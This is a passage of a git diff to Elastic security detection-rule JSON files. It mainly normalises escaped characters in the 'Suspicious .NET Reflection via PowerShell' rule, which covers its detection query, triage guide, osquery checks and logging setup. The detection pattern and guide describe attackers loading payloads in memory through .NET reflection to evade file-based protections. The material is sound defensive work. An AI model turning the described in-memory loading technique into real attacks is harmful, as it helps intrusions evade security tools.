Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Suspicious .NET Reflection via PowerShell\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can use .NET reflection to load PEs and DLLs in memory. These payloads are commonly embedded in the script, which can circumvent file-based security protections.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately outside engineering or IT business units. As long as the analyst did not identify malware or suspicious activity related to the user or host, this alert can be dismissed.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n \"[System.Reflection.Assembly]::Load\" or\n \"[Reflection.Assembly]::Load\"\n ) and not \n powershell.file.script_block_text : (\n (\"CommonWorkflowParameters\" or \"RelatedLinksHelpInfo\") and\n \"HelpDisplayStrings\"\n ) and not \n (powershell.file.script_block_text :\n (\"Get-SolutionFiles\" or \"Get-VisualStudio\" or \"Select-MSBuildPath\") and\n not file.name : \"PathFunctions.ps1\"\n )\n and not user.id : \"S-1-5-18\"\n", "references": [ "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.assembly.load" @@ -52,7 +52,7 @@ ], "risk_score": 47, "rule_id": "e26f042e-c590-4e82-8e05-41e81bd822ad", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -91,7 +91,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/e26f042e-c590-4e82-8e05-41e81bd822ad_109.json b/packages/security_detection_engine/kibana/security_rule/e26f042e-c590-4e82-8e05-41e81bd822ad_109.json index 6fcbe44e589..b81298e71fc 100644 --- a/packages/security_detection_engine/kibana/security_rule/e26f042e-c590-4e82-8e05-41e81bd822ad_109.json +++ b/packages/security_detection_engine/kibana/security_rule/e26f042e-c590-4e82-8e05-41e81bd822ad_109.json @@ -12,7 +12,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Suspicious .NET Reflection via PowerShell", - "note": "## Triage and analysis\n\n### Investigating Suspicious .NET Reflection via PowerShell\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can use .NET reflection to load PEs and DLLs in memory. These payloads are commonly embedded in the script, which can circumvent file-based security protections.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately outside engineering or IT business units. As long as the analyst did not identify malware or suspicious activity related to the user or host, this alert can be dismissed.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Suspicious .NET Reflection via PowerShell\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can use .NET reflection to load PEs and DLLs in memory. These payloads are commonly embedded in the script, which can circumvent file-based security protections.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately outside engineering or IT business units. As long as the analyst did not identify malware or suspicious activity related to the user or host, this alert can be dismissed.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n \"[System.Reflection.Assembly]::Load\" or\n \"[Reflection.Assembly]::Load\"\n ) and not \n powershell.file.script_block_text : (\n (\"CommonWorkflowParameters\" or \"RelatedLinksHelpInfo\") and\n \"HelpDisplayStrings\"\n ) and not \n (powershell.file.script_block_text :\n (\"Get-SolutionFiles\" or \"Get-VisualStudio\" or \"Select-MSBuildPath\") and\n not file.name : \"PathFunctions.ps1\"\n )\n and not user.id : \"S-1-5-18\"\n", "references": [ "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.assembly.load" @@ -52,7 +52,7 @@ ], "risk_score": 47, "rule_id": "e26f042e-c590-4e82-8e05-41e81bd822ad", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -97,7 +97,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/e26f042e-c590-4e82-8e05-41e81bd822ad_110.json b/packages/security_detection_engine/kibana/security_rule/e26f042e-c590-4e82-8e05-41e81bd822ad_110.json index 4cc5f05d1db..298d78556d7 100644 --- a/packages/security_detection_engine/kibana/security_rule/e26f042e-c590-4e82-8e05-41e81bd822ad_110.json +++ b/packages/security_detection_engine/kibana/security_rule/e26f042e-c590-4e82-8e05-41e81bd822ad_110.json @@ -12,7 +12,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Suspicious .NET Reflection via PowerShell", - "note": "## Triage and analysis\n\n### Investigating Suspicious .NET Reflection via PowerShell\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can use .NET reflection to load PEs and DLLs in memory. These payloads are commonly embedded in the script, which can circumvent file-based security protections.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately outside engineering or IT business units. As long as the analyst did not identify malware or suspicious activity related to the user or host, this alert can be dismissed.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious .NET Reflection via PowerShell\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can use .NET reflection to load PEs and DLLs in memory. These payloads are commonly embedded in the script, which can circumvent file-based security protections.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately outside engineering or IT business units. As long as the analyst did not identify malware or suspicious activity related to the user or host, this alert can be dismissed.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n \"[System.Reflection.Assembly]::Load\" or\n \"[Reflection.Assembly]::Load\"\n ) and not \n powershell.file.script_block_text : (\n (\"CommonWorkflowParameters\" or \"RelatedLinksHelpInfo\") and\n \"HelpDisplayStrings\"\n ) and not \n (powershell.file.script_block_text :\n (\"Get-SolutionFiles\" or \"Get-VisualStudio\" or \"Select-MSBuildPath\") and\n not file.name : \"PathFunctions.ps1\"\n )\n and not user.id : \"S-1-5-18\"\n", "references": [ "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.assembly.load" @@ -52,7 +52,7 @@ ], "risk_score": 47, "rule_id": "e26f042e-c590-4e82-8e05-41e81bd822ad", - "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -97,7 +97,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/e2a67480-3b79-403d-96e3-fdd2992c50ef_105.json b/packages/security_detection_engine/kibana/security_rule/e2a67480-3b79-403d-96e3-fdd2992c50ef_105.json index e6461b8356f..ba34a155aeb 100644 --- a/packages/security_detection_engine/kibana/security_rule/e2a67480-3b79-403d-96e3-fdd2992c50ef_105.json +++ b/packages/security_detection_engine/kibana/security_rule/e2a67480-3b79-403d-96e3-fdd2992c50ef_105.json @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -86,7 +86,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e2a67480-3b79-403d-96e3-fdd2992c50ef_106.json b/packages/security_detection_engine/kibana/security_rule/e2a67480-3b79-403d-96e3-fdd2992c50ef_106.json index 3a665981ba8..f4a8774c10d 100644 --- a/packages/security_detection_engine/kibana/security_rule/e2a67480-3b79-403d-96e3-fdd2992c50ef_106.json +++ b/packages/security_detection_engine/kibana/security_rule/e2a67480-3b79-403d-96e3-fdd2992c50ef_106.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + 